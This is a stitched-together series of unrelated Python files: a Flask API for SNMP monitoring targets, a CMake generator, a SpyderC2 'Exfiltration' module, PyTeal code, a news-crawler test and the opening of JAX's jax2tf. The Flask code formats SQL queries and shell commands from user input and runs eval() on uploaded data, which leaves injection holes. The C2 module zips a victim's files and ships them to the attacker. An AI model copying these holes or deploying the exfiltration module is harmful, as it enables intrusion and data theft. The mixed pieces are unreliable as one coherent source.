status, message = judge_target_IP_exist(args['IP'], args['host_id'])
if status is not True:
return {"status": False, "message": message}, 500
status, result = db.update_by_id("target", json.dumps(target, ensure_ascii=False), target_id)
db.close_mysql()
if status is not True:
logger.error("Modify target: %s" % result)
return {"status": False, "message": result}, 500
return {"status": True, "message": result}, 200
class TargetList(Resource):
@access_required(role_dict["common_user"])
def get(self):
logger.info("TargetLIST")
host_id = request.args.get("host_id")
db = DB()
status, result = db.select("target", "where data -> '$.host_id'='%s'" % host_id)
if status is True:
target_list = result
else:
db.close_mysql()
return {"status": False, "message": result}, 500
db.close_mysql()
return {"data": target_list, "status": True, "message": ""}, 200
@access_required(role_dict["product"])
def post(self):
args = parser.parse_args()
args["id"] = uuid_prefix("t")
del args['path'], args['key_word'], args['file_name'], args['target_id'], args['cipher']
target = args
db = DB()
status, message = judge_target_IP_exist(args['IP'], args['host_id'])
if status is True:
insert_status, insert_result = db.insert("target", json.dumps(target, ensure_ascii=False))
if insert_status is not True:
db.close_mysql()
return {"status": False, "message": str(insert_result)}, 500
else:
db.close_mysql()
return {"status": False, "message": message}, 500
db.close_mysql()
return {"status": True, "message": message}, 200
def judge_target_IP_exist(IP, host_id):
db = DB()
status, result = db.select("target", "where data -> '$.IP'='%s' AND data -> '$.host_id'='%s'" % (
IP, host_id))
if status is not True:
return False, 'select error'
else:
if len(result) == 0:
return True, ''
else:
return False, 'IP already exists'
# 上传文件
class UploadTarget(Resource):
@access_required(role_dict["common_user"])
def post(self):
logger.info("UploadTarget")
args = parser.parse_args()
host_id = args['host_id']
file = request.files['file']
file.save(os.path.join('/tmp', file.filename))
db = DB()
try:
xlsx_file = Xlsx(os.path.join('/tmp', file.filename))
xlsx_file.read()
config_db_result = xlsx_file.export_db()
targets = config_db_result.split(';')
status, set_repeat = self.get_repeat_target(targets)
if not status:
logger.info('存在重复IP')
return {"status": True, "message": "存在重复IP!为:" + str(set_repeat)}, 200
exist_ip_list = []
for i in range(0, len(targets) - 1):
target_dic = eval(targets[i])
target_dic['host_id'] = host_id
target_dic['id'] = uuid_prefix('t')
logger.info(str(target_dic))
status, message = judge_target_IP_exist(target_dic['IP'], host_id)
if status:
insert_status, insert_result = db.insert("target", json.dumps(target_dic, ensure_ascii=False))
if insert_status is not True:
logger.error("error:" + insert_result)
return {"status": False, "message": str(insert_result)}, 200
else:
exist_ip_list.append(target_dic['IP'])
if len(exist_ip_list) == 0:
return {"status": True, "message": ""}, 200
else:
return {"status": False, "message": "表格中有已经存在的IP:" + str(exist_ip_list) + ',其余IP已经添加完成'}, 200
except Exception as e:
logger.info('error:' + str(e))
return {"status": False, "message": str(e)}, 200
finally:
logger.info("close db")
db.close_mysql()
def get_repeat_target(self, target_list):
set_base = set()
set_repeat = set()
for i in range(0, len(target_list) - 1):
target_dic = eval(target_list[i])
key = target_dic['IP']
if set_base.__contains__(key):
set_repeat.add(key)
else:
set_base.add(key)
if set_repeat:
return False, set_repeat
else:
return True, set_repeat
class ConfigGenerate(Resource):
@access_required(role_dict["common_user"])
def post(self):
logger.info("ConfigGenerate")
db = DB()
# 首先取得所有所需配置参数,并做处理
args = parser.parse_args()
host_id = args['host_id']
key_word = args['key_word']
path = args['path']
file_name = args['file_name']
path_str = str(path)
if path_str:
if path_str.endswith('/'):
path_str = path_str
else:
path_str = path_str + '/'
else:
path_str = '/usr/local/prometheus/conf.d/'
if file_name:
file_name = file_name
else:
file_name = 'snmpconf_' + key_word + '.json'
state, result = db.select('host', "where data -> '$.id'='%s'" % host_id)
if state is False:
return {"status": False, "message": '主机信息未知'}, 500
host = dict(result[0])
product_id = host['product_id']
minion_id = host['minion_id']
state, product_result = db.select('product', "where data -> '$.id'='%s'" % product_id)
if state is False:
return {"status": False, "message": 'product未知'}, 500
product_host = product_result[0]
master_id = product_host['salt_master_id']
salt_api = salt_api_for_product(product_id)
# 完成关键词搜索的文件的生成
status, result = db.select("target", "where data -> '$.host_id'='%s'" % host_id)
if status is True:
target_list = result
else:
db.close_mysql()
return {"status": False, "message": result}, 500
try:
strresult = '[\n'
for target in target_list:
model = str(target['model'])
if model.__contains__(key_word):
target_str = target.pop('target')
del target['host_id'], target['id']
resdic = {"targets": [target_str], "labels": target}
strresult += " " + str(resdic) + ',\n'
strresult = strresult[:-1] + '\n]'
except Exception as e:
return {"status": False, "message": '监控目标信息解析出错'}, 500
# 上传文件到gitlab中
project_name_list = list(get_host_project(host))
logger.info('project_name_list' + str(project_name_list))
if len(project_name_list) == 0:
return {"status": False, "message": '该主机无归属项目'}, 200
elif len(project_name_list) > 1:
return {"status": False, "message": '该主机所属项目不唯一!' + str(project_name_list)}, 200
state, result = db.select('projects', "where data -> '$.name'='%s'" % project_name_list[0])
project_gitlab_name = result[0]['gitlab_name']
logger.info("project_gitlab_name:" + project_gitlab_name)
project, _ = gitlab_project_name(product_id, project_gitlab_name)
# 完成命令拼装
source = '/tmp/' + project_gitlab_name + '/' + minion_id + '/' + file_name
source_tmp = '/tmp/' + project_gitlab_name + '/' + minion_id + '/tmp_file'
dest = path_str + file_name
command = 'salt-cp ' + minion_id + ' ' + source_tmp + ' ' + dest
# 支持的action create, delete, move, update
branch_name = "master"
data_create = {
'branch': branch_name,
'commit_message': command,
'actions': [
{
'action': "create",
'file_path': minion_id + '/' + file_name,
'content': strresult
}
]
}
data_update = {
'branch': branch_name,
'commit_message': command,
'actions': [
{
'action': "update",
'file_path': minion_id + '/' + file_name,
'content': strresult
}
]
}
if isinstance(project, dict):
return project, 500
else:
try:
project.commits.create(data_create)
except Exception as e:
# logger.info('update'+str(e))
project.commits.create(data_update)
# 验证权限,执行发送功能
command_path = 'mkdir -p ' + path_str
logger.info('minion_id:' + minion_id)
salt_api.shell_remote_execution(minion_id, command_path)
# 因为传输中名称需要中文,故使用中间文件
command_list = []
command_list.append('cd /tmp/' + project_gitlab_name + ' \n ')
command_list.append('git pull \n ')
command_list.append('cp ' + source + ' ' + source_tmp + ' \n ')
command_list.append(command + ' \n ')
command_list.append('rm -f ' + source_tmp + ' \n ')
command_final = ''.join(command_list)
logger.info('command:' + command_final)
result = salt_api.shell_remote_execution([master_id], command_final)
logger.info('result:' + str(result))
if str(result).__contains__('True'):
return {"status": True, "message": '配置发送成功'}, 200
else:
return {"status": False, "message": '配置发送失败:' + str(result)}, 500
def get_host_project(host):
minion_id = host['minion_id']
db = DB()
status, group_list = db.select('groups', '')
project_name_list = []
try:
for group in group_list:
minion_list = list(group['minion'])
if minion_list.__contains__(minion_id):
project_name_list = project_name_list + group['projects']
except Exception as e:
logger.info('Exception:' + str(e))
db.close_mysql()
return project_name_list
class PingList(Resource):
@access_required(role_dict["common_user"])
def post(self):
logger.info("PingList")
args = parser.parse_args()
db = DB()
host_id = args['host_id']
cipher = args['cipher']
state, result = db.select('host', "where data -> '$.id'='%s'" % host_id)
minion_id = result[0]['minion_id']
logger.info('minion_id:' + minion_id)
product_id = result[0]['product_id']
salt_api = salt_api_for_product(product_id)
state, targets = db.select('target', "where data -> '$.host_id'='%s'" % host_id)
targets_not = []
thread_pool = ThreadPoolExecutor(max_workers=10, thread_name_prefix="target_")
futures = []
for target in targets:
future = thread_pool.submit(pingTarget, target, minion_id, salt_api, cipher)
futures.append(future)
thread_pool.shutdown(wait=True)
for future in futures:
result = future.result()
logger.info(str(result['status']))
if str(result['status']).__contains__("Timeout") | str(result['status']).__contains__("Unknown"):
targets_not.append(result["target"])
return {"status": True, "message": '配置发送成功', "data": targets_not}, 200
def pingTarget(target, minion_id, salt_api, cipher):
command = 'snmpwalk -v 2c -t 0.5 -c \'' + cipher + '\' ' + target["IP"] + ' 1.3.6.1.2.1.1.1'
logger.info(command)
exec_result = salt_api.shell_remote_execution([minion_id], command)
result = {'target': target, 'status': exec_result}
return result
class SinglePing(Resource):
@access_required(role_dict["common_user"])
def post(self):
logger.info("SinglePing")
args = parser.parse_args()
target_id = args['target_id']
cipher = args['cipher']
# 获得所需参数minion_id、product_id、target_ip
db = DB()
state, result = db.select_by_id('target', target_id)
target_ip = result['IP']
host_id = result['host_id']
state, result = db.select_by_id('host', host_id)
minion_id = result['minion_id']
product_id = result['product_id']
salt_api = salt_api_for_product(product_id)
command = 'snmpwalk -v 2c -t 0.5 -c \'' + cipher + '\' ' + target_ip + ' 1.3.6.1.2.1.1.1'
logger.info('command:'+command)
sysDescr = salt_api.shell_remote_execution([minion_id], command)
response_data = {}
if str(sysDescr[minion_id]).__contains__("Timeout") | str(sysDescr[minion_id]).__contains__("Unknown"):
response_data['status'] = '设备网络不通'
else:
response_data['status'] = "设备正常"
response_data['sysDescr'] = str(sysDescr[minion_id])
return {"status": True, "message": '成功', "data": response_data}, 200
class TruncateTarget(Resource):
@access_required(role_dict["common_user"])
def post(self):
logger.info("TruncateTarget")
args = parser.parse_args()
host_id = args['host_id']
db = DB()
state, result = db.delete('target', "where data -> '$.host_id'='%s'" % host_id)
if state:
return {"status": True, "message": '成功'}, 200
else:
return {"status": False, "message": '删除失败'}, 500
|
py | 1a4bb8fd727f04f535faf8aba90dcb096af5490b | # 3_cmakefile_gen.py - helper to create CMakeLists.txt files
# for directory tree of IDL files, to build as merged typesupport static library
# Started 2020Nov09 Neil Puthuff
import sys
import os
file_header = '''# Copyright 2020 Real-Time Innovations
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
include(ConnextDdsRosDdsTypes)
'''
file_midblock = '''
# for unbounded strings & sequences use -DUNBOUNDED_ALL on CMake cmdline
if(UNBOUNDED_ALL)
set(extra_params UNBOUNDED)
endif()
connextdds_generate_ros_dds_types(
LANG ${LANG}
OUTPUT_DIRECTORY "${CMAKE_CURRENT_BINARY_DIR}"
IDL_FILES ${idl_files}
INCLUDE_DIRS ${top_level_source_dir}
${extra_params}
)
'''
cmake_file_opened = False
cmake_libname = ""
# walk along the provided paths, searching for IDL files
for root, dirs, files in os.walk(sys.argv[1]):
# if dirs are listed, prepare to create a CMakeLists.txt file
if len(dirs) > 0:
# there are subdirs; this might be the place to put a CMakeLists.txt file
# if a CMakeLists.txt file is already opened, finish it
if cmake_file_opened == True:
# write remainder of file, then close it.
f_cmake.write("{}".format(file_midblock))
f_cmake.write("add_library( {} OBJECT\n ".format(cmake_libname) + "${generated_file_list}\n)\n\n")
f_cmake.write("set_property(TARGET {} PROPERTY \n POSITION_INDEPENDENT_CODE ON\n)\n\n".format(cmake_libname))
f_cmake.write("target_include_directories({} PRIVATE \n ".format(cmake_libname) + "${CONNEXTDDS_INCLUDE_DIRS}\n ${top_level_binary_dir}\n)\n\n")
f_cmake.write("target_compile_definitions({} PRIVATE \n ".format(cmake_libname) + "${CONNEXTDDS_COMPILE_DEFINITIONS}\n)\n\n")
f_cmake.write("add_dependencies({} \n stdlibrary \n)\n".format(cmake_libname))
f_cmake.close()
cmake_file_opened = False
cmake_file_root = root
# check for IDL files in this dir
if len(files) > 0:
for fcand in files:
if fcand.endswith('.idl'):
if cmake_file_opened == False:
# open file, init with header and such, make libname
f_cmake = open('{}/CMakeLists.txt'.format(cmake_file_root), "w")
f_cmake.write("{}\n".format(file_header))
cmake_file_opened = True
# create libname for this directory
cmake_libname = cmake_file_root.strip(".").strip("/").strip("\\").replace("_", "") + "library"
print("CMakeLists.txt file in {} for {}".format(cmake_file_root, cmake_libname))
# add IDL file to CMakeList.txt file
myDir = os.path.split(root)
f_cmake.write("list(APPEND idl_files \"${CMAKE_CURRENT_SOURCE_DIR}/" + "{}/{}\")\n".format(myDir[1] ,fcand))
if cmake_file_opened == True:
# write remainder of file, then close it.
f_cmake.write("{}".format(file_midblock))
f_cmake.write("add_library( {} OBJECT\n ".format(cmake_libname) + "${generated_file_list}\n)\n\n")
f_cmake.write("set_property(TARGET {} PROPERTY \n POSITION_INDEPENDENT_CODE ON\n)\n\n".format(cmake_libname))
f_cmake.write("target_include_directories({} PRIVATE \n ".format(cmake_libname) + "${CONNEXTDDS_INCLUDE_DIRS}\n ${top_level_binary_dir}\n)\n\n")
f_cmake.write("target_compile_definitions({} PRIVATE \n ".format(cmake_libname) + "${CONNEXTDDS_COMPILE_DEFINITIONS}\n)\n\n")
f_cmake.write("add_dependencies({} \n stdlibrary \n)\n".format(cmake_libname))
f_cmake.close()
cmake_file_opened = False
|
py | 1a4bb91884ec86e41fbdcc424f01762621b7a016 | import sys
import os
import pdb
import pathlib
import time
import base64
sys.path.append(os.path.join(str(pathlib.Path(__file__).parent.resolve()),'../../lib'))
from module import Module
class Exfiltration(Module):
description = 'This module downloads the specified files on victim to the attacker'
@classmethod
def module_options(cls):
h = {
'path' : {'desc' : 'Directory on the attacker machine where the files are downloaded. Default is shared/victim_data/<victim_id>. NOTE : The default path can be accessed in both docker and host, accessibility of custom path will depend on where you run the program.', 'required' : False},
'location' : {'desc': 'Path of directory or file on victim to exfiltrate.','required': True}
}
return h
def __init__(self,name,utility,language,options):
## We are loading the script in the script variable here
super(Exfiltration, self).__init__(name,self.description,utility,language,getattr(self,f"script_{language}")(options))
## This class is called when victim returns the output for the task of this module. What is to be done with the output is defined here
def handle_task_output(self,data,options,victim_id, task_id):
## Default Dumping path
dump_path = os.path.join(str(pathlib.Path(__file__).parent.resolve()),'../../shared/victim_data',victim_id)
if not os.path.exists(dump_path):
os.makedirs(dump_path)
filename = f"exfiltration_file_{task_id}.zip"
filepath = os.path.join(dump_path,filename)
if 'path' in options:
if not os.path.exists(options['path']):
print(f"Provided save path does not exists - {options['path']}. Saving to default directory {filepath}")
else:
filepath = os.path.join(options['path'],filename)
## Check if we have write perms else save to /tmp/SpyderC2
if not os.access(os.path.dirname(filepath), os.W_OK):
dump_path = os.path.join('/tmp','SpyderC2',victim_id)
print(f"No write access to {os.path.dirname(filepath)}. Saving to {dump_path}")
if not os.path.exists(dump_path):
os.makedirs(dump_path,exist_ok=True)
filepath = os.path.join(dump_path,filename)
## Dump the zip file
with open(filepath, "wb") as f:
if self.language == 'python':
f.write(data)
else:
## Incase of powershell we send by base64 encoding
decoded = base64.b64decode(data)
f.write(decoded)
f.close()
output = filepath
return output
def script_python(self,options):
script = """def execute_command():
import os
from os.path import isfile, join
import shutil
location = '##location##'
if isfile(location):
path = shutil.make_archive(location, 'zip',os.path.dirname(location), location)
elif os.path.isdir(location):
path = shutil.make_archive(location, 'zip',location, location)
else:
## Doesn't exist
pass
content = open(path,"rb").read()
return content"""
## TODO - make this through a loop for all params
## TODO - this should be required parameter
if 'location' in options:
value = options['location']
else:
value = options['stager_location']
script = script.replace('##location##',value.replace('\\','\\\\'))
return script
def script_powershell(self,options):
script = """Compress-Archive -Path ##location## -DestinationPath ##location##.zip -Force
$bytes = [System.IO.File]::ReadAllBytes('##location##.zip')
$encoded = [System.Convert]::ToBase64String($bytes)
return $encoded"""
if 'location' in options:
value = options['location']
else:
value = options['stager_location']
script = script.replace('##location##',value)
return script
|
py | 1a4bb92e29270a9bf82996b81ec6788a955deb1b | from typing import Sequence
from ..types import TealType, require_type
from ..errors import TealInputError
from ..ir import TealOp, Op, TealSimpleBlock
from .expr import Expr
class NaryExpr(Expr):
"""N-ary expression base class.
This type of expression takes an arbitrary number of arguments.
"""
def __init__(self, op: Op, inputType: TealType, outputType: TealType, args: Sequence[Expr]):
if len(args) < 2:
raise TealInputError("NaryExpr requires at least two children.")
for arg in args:
if not isinstance(arg, Expr):
raise TealInputError("Argument is not a pyteal expression: {}".format(arg))
require_type(arg.type_of(), inputType)
self.op = op
self.outputType = outputType
self.args = args
def __teal__(self):
start = None
end = None
for i, arg in enumerate(self.args):
argStart, argEnd = arg.__teal__()
if i == 0:
start = argStart
end = argEnd
else:
end.setNextBlock(argStart)
opBlock = TealSimpleBlock([TealOp(self.op)])
argEnd.setNextBlock(opBlock)
end = opBlock
return start, end
def __str__(self):
ret_str = "(" + str(self.op),
for a in self.args:
ret_str += " " + a.__str__()
ret_str += ")"
return ret_str
def type_of(self):
return self.outputType
NaryExpr.__module__ = "pyteal"
def And(*args: Expr) -> NaryExpr:
"""Logical and expression.
Produces 1 if all arguments are nonzero. Otherwise produces 0.
All arguments must be PyTeal expressions that evaluate to uint64, and there must be at least two
arguments.
Example:
``And(Txn.amount() == Int(500), Txn.fee() <= Int(10))``
"""
return NaryExpr(Op.logic_and, TealType.uint64, TealType.uint64, args)
def Or(*args: Expr) -> NaryExpr:
"""Logical or expression.
Produces 1 if any argument is nonzero. Otherwise produces 0.
All arguments must be PyTeal expressions that evaluate to uint64, and there must be at least two
arguments.
"""
return NaryExpr(Op.logic_or, TealType.uint64, TealType.uint64, args)
def Concat(*args: Expr) -> NaryExpr:
"""Concatenate byte strings.
Produces a new byte string consisting of the contents of each of the passed in byte strings
joined together.
All arguments must be PyTeal expressions that evaluate to bytes, and there must be at least two
arguments.
Example:
``Concat(Bytes("hello"), Bytes(" "), Bytes("world"))``
"""
return NaryExpr(Op.concat, TealType.bytes, TealType.bytes, args)
|
py | 1a4bb9746827c065ced671f37c349a377e59cde0 | # encoding=utf-8
# Author: Yu-Lun Chiang
# Description: Test NewsCrawler
import logging
import pytest
from collections import namedtuple
from Sanga.media import wealth
from Sanga.struct import NewsStruct
logger = logging.getLogger(__name__)
TEST_DATA = namedtuple(
typename="TEST_DATA",
field_names=[
"name",
"link",
"expected_output",
],
)
TEST_DATA_1 = TEST_DATA(
name="財訊_1",
link="https://www.wealth.com.tw/home/articles/31815",
expected_output=NewsStruct(
title="三級警戒搶物資 愛之味、味王等「囤貨概念股」動起來 - 財訊雙週刊",
content="\n\n▲隨著政府宣布全台進入三級警戒,不僅實體賣場擠滿民生物資掃貨人潮,網路購物更已大塞車。(圖/攝影組)\n新冠肺炎變種病毒肆虐,本土確認病例暴增,隨著政府宣布雙北進入三級警戒(編按:19日全台升級三級疫情警戒),不僅實體賣場擠滿民生物資掃貨人潮,網路購物更已大塞車,家樂福線上購物不僅暫停「當日配」、新竹以北配送日更只能選擇8~14天;在momo購買快速到貨的消費者也收到簡訊通知,因防疫商品訂單激增,所訂購商品預計5日內配送完成;知名食品廠愛之味(1217)與味王(1203)都表示,這幾天各賣場下單量超多,主要是進入第三級警戒後才開始動起來。\n但究竟只是疫情升溫下的題材反應?還是會帶來實質挹注?對比愛之味疫情相對平穩的今(2021)年第一季合併營收為年減4.91%,再以去(2020)年第一季新冠肺炎疫情剛出現、恐慌情緒也引爆過物資搶購潮為例,該季營收年增15.61%、不僅為17季最大,對屬於需求相對飽和的食品業來說,也是該公司單季營收年增幅極少數超過15%的季度。味王則受限泡麵產能已達極限,去年第一季營收年增6.51%相對平穩、但仍優於今年第一季的年減5.85%。\n泰山(1218)去年第一季營收年增6.18%、相較前一年的年減6.16%為優,主要受惠八寶粥等甜點罐頭也成為搶購標的,但因時值旺季的大宗物資、當中業務用油隨餐飲通路受影響,反倒是疫情不嚴重的今年第一季,大宗物資受惠黃小玉飆漲、營收年增達22.90%;今年因疫情升溫在八寶粥進入旺季、大宗物資開始淡季的第二季,法人表示,旺的會受惠疫情更旺、淡的受衝擊程度減少,加上黃小玉續漲,因此整體營運受惠大於受害。\n就台灣而言,本波疫情為最嚴峻的時刻,第二季的業績是否會超越去年第一季?愛之味表示,雖然賣場這幾天對醬菜、甜點、燕麥奶等產品的下單量超多,但因爆量也才這幾天,受惠幅度還需要再觀察,肯定的是,若時間拉長,對營收會有實質幫助,尤其愛之味主要以B2C的消費食品為主、較無2B部分的干擾。味王在泡麵產能擴增計劃尚未正式啟動下,產能已滿、受惠程度也相對有極限,並且會以供應大賣場、超商、超市等現代通路為優先。\n投資專家又怎麼看疫情下的囤貨概念股?日盛投顧總經理鍾國忠指出,就短期而言,民以食為天、加上食衣住行民生需求不會因為疫情下降,害怕染疫的情緒會讓更多消費者轉往線上採購,不想出門就會多備糧,因此食品股與電商業者業績確實會受惠;另一個角度,食品業在第二季也開始進入傳統旺季,電商更是長期成長的產業,兩者均有長線可保護短線;只是就食品股的受惠程度,同樣生產泡麵與罐頭,股本24億的味王、49億的愛之味,會大於568億的統一(1216)。\n電商的長期成長趨勢,從富邦媒(8454)與網家(8044)月營收持續創同期新高即可理解,富邦媒曾表示,主要還是靠自己本身布局帶來的成長、去年疫情則多了約3/1成長力道的加分;網家也觀察到去年疫情帶來史無前例的流量,只是如何轉為實質業績,坦言持續努力中。\n法人認為,相較於雙11必須各憑本事爭高下,疫情對電商帶來的加分則更為雨露均霑,在瘋搶物資的情緒下,消費者較難去計較平台喜好度與價格划算度;這對於曾表示電商產業已大者恆大的創業家(8477)而言,是其終止連3季虧損的一大契機。\n統整近日防疫物資爆買潮為各家電商帶來的盛況:富邦媒表示,隨著疫情升溫,防疫商品、食品(料理包、米麵、罐頭、冷凍食品等)、民生用品如衛生紙、家用清潔等買氣皆有數倍成長。\n網家也指出,站上防疫生活用品需求持續暴增,包括酒精濕紙巾、抗菌噴霧、洗手機、乾洗手等銷量翻倍,其中口罩銷量近2日飆升36倍、洗手乳銷量亦大幅成長12倍,衛生紙銷量顯著成長3.5倍、抗菌洗衣精及漂白水銷量成長1倍。\n創業家旗下電商平台生活市集、松果購物則觀察到消費者對於防疫相關物資的需求大幅提升,口罩成為最熱銷防疫商品,本土確診案例數開始飆高後,口罩單日整體銷量較平日大幅成長18倍,其中最熱銷款單日銷量逾50萬片。而消毒用的酒精、次氯酸水,免接觸人體的測溫槍,則成為緊追在後的熱銷防疫商品。\n▲味王(TW.1203) 2021/05/20 開36.00 高36.30 低35.15 收35.45 量236張\n(本文由「Money DJ」授權轉載)\n",
keywords=[
"政治",
"財經",
"股市",
"理財",
"投資",
"房地產",
"保險",
"稅務",
"商品",
"期貨",
"企業",
"科技",
"金融",
"生技",
"新產業",
"人物",
"專欄",
"投資高手",
"投資新鮮人",
"專題企業",
"健康醫療",
"美食休閒",
"財訊生活",
"財訊書房",
],
category="股市前線",
media="財訊",
datetime="2021-05-22T07:00:00+08:00",
link="https://www.wealth.com.tw/home/articles/31815",
),
)
TEST_DATA_2 = TEST_DATA(
name="財訊_2",
link="https://www.wealth.com.tw/home/articles/32190",
expected_output=NewsStruct(
title="大盤近月震盪2千點,該衝還是該跑?大股東持股比率增加 Top20:這3檔增幅超過10% - 財訊雙週刊",
content="\n\n▲大盤近月震盪2千點,千張以上大戶增持與減持家數平分秋色。(圖/攝影組) \n近1個月台股行情上沖下洗2千點,雖然千張以上大戶增持與減持家數平分秋色,不過下半年仍有疫情與高基期等變數,跟著大戶籌碼走,可為現階段值得觀察的指標。\n國內新冠疫情爆發已經1個月了,可是每日新增確診的人數仍在3百人以上,雖然近日確診數略降至2百人左右,但由於端午連假疫情發展的不確定性,以及3級警戒再度延長至六月底,未來台股的不確定性似乎也逐漸增高。\n千張大戶消息靈通 動向可為散戶觀察指標\n不過,在這1個月內,加權指數上沖下洗,震盪點數超過2千點,如果不是定力很夠,大概早就被「洗」出場了。而在這個堪稱兵荒馬亂的行情之下,到底後市如何研判,可能要問問產業界第一線的人。\n產業界裡消息最靈通的,除了大股東,大概沒有別人了,尤其是持股千張以上的大股東,絕對算是公司的「消息人士」。因此,如果在這個人心惶惶的時間點,大股東敢趁亂加碼,那就表示公司發展後勢可期;反之,若大股東在此逢高減碼,那麼我們這些散戶投資人可得照子放亮點,一有不對勁,早點腳底抹油、持股減碼才是。\n根據統計資料,近1個月千張以上大股東持股比率增加的共726家,持平的316家,減少持股的712家。雖然光看數字,增持的家數大於減持的家數,但差距不大,算是55波,平分秋色。不過增持的家數與減持的家數都各占了40%,表示大股東調整持股的比率算滿高的。\n接下來,我們分別針對近1個月,大股東增持、減持的前20名做統計分析,請參考附表。\nIC設計各自表現 電子廠憂疫情干擾\n先看近1個月千張大股東持股比率增加的前20名,其中有3檔增幅10%以上,分別是志嘉(5529)、天剛(5310)及晉泰(6221),巧合的是,這三檔都曾謠傳經營權異動情事。\n從這二十檔個股中,可發現半導體相關個股相對較多,包括漢磊(3707)、廣穎(4973)、聯傑(3094)、新唐(4919)、義隆電(2458)等,尤其是以IC設計族群最為明顯,仍是台灣電子產業的主要趨勢。\n接下來,觀察近1個月千張大股東持股比率減少的前20名,當中高達13檔個股是電子股,其餘7檔是傳產股;而電子股當中,面板股占了3檔,包含面板雙虎友達(2409)、群創(3481),以及彩晶(6116)。有趣的是,IC設計也有4檔出現大股東明顯減持的情形,分別是偉詮電(2436)、晶豪科(3006)、宏觀(6568)、富鼎(8261)。\n至於傳產股中,大多是原物料相關,聚亨(2022)、中纖(1718),另外因為本波疫情關係而業績大好的國內物流股嘉里大榮(2608)、台驊投控(2636),大股東亦是趁著本波股價大漲之際,減低手中的持股,畢竟疫情終究有一天會獲得控制,而股價目前在歷史的高檔,大股東抓到機會出脫手中持股,也是理所當然的。\n雖然在統計數據上,近一個月大股東增持的家數與減持的家數相差不多,但如果就增減的力道來看,減持的力道比增持的力道要大得多,評估有2個主要原因,第1個原因是因為疫情控制的速度太慢,產業界已傳出群聚感染,在反應不及的情況下,勢必對於營收會造成衝擊。\n第2個原因是去年的下半年,營收的基期偏高,今年在沒有疫情的干擾下,要較去年大幅成長的機會本來就小,再加上現在疫情延燒,還看不見盡頭在哪,對於下半年產業展望保守,所以趁此時拋售持股。\n無論千張以上股東減持的原因是否就是上述這二個大環境的疑慮,抑或是個別公司的問題,但說到底,只要大股東出現減持現象,投資人終究應該放在心上,謹慎看待。…(更多內容,請參閱最新一期《今周刊》第1277期)\n延伸閱讀:\n除了捐贈75萬劑疫苗 美國還打算找台灣談「這件事」 可能會讓中國更火大\n她駕黑鷹直升機,遭擊落失去雙腿! 50歲生子、更代表美國訪台送疫苗…「活著的每一天,我要對得起救我的人」\n壹電視攝影猝死後確診》走進廁所前毫無異狀!這「4個病徵」易忽略,恐是死亡前兆\n",
keywords=[
"政治",
"財經",
"股市",
"理財",
"投資",
"房地產",
"保險",
"稅務",
"商品",
"期貨",
"企業",
"科技",
"金融",
"生技",
"新產業",
"人物",
"專欄",
"投資高手",
"投資新鮮人",
"專題企業",
"健康醫療",
"美食休閒",
"財訊生活",
"財訊書房",
],
category="股市前線",
media="財訊",
datetime="2021-06-10T10:48:00+08:00",
link="https://www.wealth.com.tw/home/articles/32190",
),
)
TEST_DATA_LIST = [TEST_DATA_1, TEST_DATA_2]
@pytest.fixture(scope="module")
def newsCrawler():
logger.warning("Init News Crawler ...")
return wealth.Wealth()
@pytest.mark.parametrize(
argnames="name, link, expected_output",
argvalues=[tuple(t) for t in TEST_DATA_LIST],
ids=[
f"{t.name}, {t.link[:50]+'...' if len(t.link) > 50 else t.link}"
for t in TEST_DATA_LIST
],
)
def test_get_info(
newsCrawler,
name,
link,
expected_output,
):
output = newsCrawler.getInfo(link=link)
assert NewsStruct.__2dict__(output) == NewsStruct.__2dict__(expected_output)
|
py | 1a4bbb48932f283a8691d35c5e6fbbef854181b1 | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Experimental module transforms JAX functions to be executed by TensorFlow."""
import functools
import re
import string
from typing import Any, Callable, Dict, Iterable, List, Optional, Sequence, Tuple, Union
import jax
from jax import ad_util, api, api_util, config
from jax import core, custom_derivatives, dtypes
from jax import linear_util as lu
from jax import numpy as jnp
from jax import random, tree_util
from jax._src import util
from jax.api_util import flatten_fun
from jax.interpreters import ad, batching
from jax.interpreters import masking
from jax.interpreters import pxla
from jax.interpreters import sharded_jit
from jax.interpreters import xla
from jax._src.lax import lax
from jax._src.lax import linalg as lax_linalg
from jax._src.lax import control_flow as lax_control_flow
from jax._src.lax import fft as lax_fft
import jax._src.random
from jax.lib import xla_bridge as xb
import numpy as np
import tensorflow as tf # type: ignore[import]
# These don't have public equivalents.
# pylint: disable=g-direct-tensorflow-import
from tensorflow.compiler.tf2xla.python import xla as tfxla # type: ignore[import]
from tensorflow.compiler.xla import xla_data_pb2 # type: ignore[import]
from tensorflow.compiler.xla.experimental.xla_sharding import xla_sharding # type: ignore[import]
# pylint: enable=g-direct-tensorflow-import
from jax.lib import xla_client
# The scope name need to be a valid TensorFlow name. See
# https://github.com/tensorflow/tensorflow/blob/r2.3/tensorflow/core/framework/node_def_util.cc#L731
_VALID_SCOPE_REGEX = re.compile("^[A-Za-z0-9.][A-Za-z0-9_.\\/>-]*$")
_INVALID_SCOPE_CHAR = re.compile("[^A-Za-z0-9_.\\/>-]")
def _sanitize_scope_name(name):
scope_name = _INVALID_SCOPE_CHAR.sub("_", name)
if not _VALID_SCOPE_REGEX.match(scope_name):
scope_name = ".{}".format(scope_name)
return scope_name
# A value suitable in a TF tracing context: tf.Tensor, tf.Variable,
# or Python scalar or numpy.ndarray. (A tf.EagerTensor is a tf.Tensor.)
TfVal = Any
DType = Any
def _is_tfval(v: TfVal) -> bool:
if isinstance(v, (tf.Tensor, tf.Variable)):
return True
try:
# Note: this conversion is overkill and just intended as a type check; this code
# is in principle only run if core.skip_checks is False.
# TODO: it is not true that this code is run only without skip_checks
_safe_convert_to_tensor(v)
return True
except ValueError:
return False
def _safe_convert_to_tensor(val, dtype=None) -> TfVal:
dtype = dtype if dtype else (val.dtype if hasattr(val, "dtype") else None)
conversion_type = to_tf_dtype(dtype) if dtype else None
